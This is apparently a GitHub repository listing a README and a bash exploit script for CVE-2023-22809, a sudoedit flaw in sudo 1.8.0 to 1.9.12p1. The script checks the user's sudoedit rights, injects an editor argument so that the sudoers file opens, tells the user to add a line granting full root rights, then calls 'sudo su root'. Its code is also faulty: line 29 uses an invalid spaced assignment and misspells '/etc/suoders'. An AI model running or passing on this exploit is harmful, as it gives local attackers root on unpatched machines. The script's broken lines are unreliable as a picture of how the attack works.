STRLCPY/CVE-2023-22809-sudoedit-privesc

■ ■ ■ ■ ■ ■

README.md

1	+	# CVE-2023-22809
2	+
3	+	## sudo Privilege escalation
4	+
5	+	Affected sudo versions: 1.8.0 to 1.9.12p1
6	+
7	+	This script automates the exploitation of the CVE-2023-22809 vulnerability to
8	+	gain a root shell.
9	+
10	+	The script checks if the current user has access to run the `sudoedit` or
11	+	`sudo -e` command for some file with root privileges. If it does it opens the
12	+	sudoers file for the attacker to introduce the privilege escalation policy
13	+	for the current user and get a root shell.
14	+

■ ■ ■ ■ ■ ■

exploit.sh

1	+	#!/usr/bin/env bash
2	+	#
3	+	# sudo 1.8.0 - 1.9.12p1 - Privilege Escalation
4	+	#
5	+	# Exploit Author: n3m1.sys
6	+	# CVE: CVE-2023-22809
7	+	# Vendor Homepage: https://www.sudo.ws/
8	+	# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz
9	+	# Version: 1.8.0 to 1.9.12p1
10	+	# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9
11	+	#
12	+	# Running this exploit on a vulnerable system allows a localiattacker to gain
13	+	# a root shell on the machine.
14	+	#
15	+	# The exploit checks if the current user has privileges to run sudoedit or
16	+	# sudo -e on a file as root. If so it will open the sudoers file for the
17	+	# attacker to add a line to gain privileges on all the files and get a root
18	+	# shell.
19	+
20	+	EXPLOITABLE=$(sudo -l \| grep -E "sudoedit\|sudo -e" \| grep -E "(root)" \| cut -d ' ' -f 6-)
21	+
22	+	if [ -z "$EXPLOITABLE" ]; then
23	+	echo "> This user can't run sudoedit as root"
24	+	else
25	+	echo "> BINGO! User exploitable"
26	+	echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
27	+	echo "$USER ALL=(ALL:ALL) ALL"
28	+	read -n 1 -s -r -p "Press any key to continue..."
29	+	EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
30	+	sudo su root
31	+	fi
32	+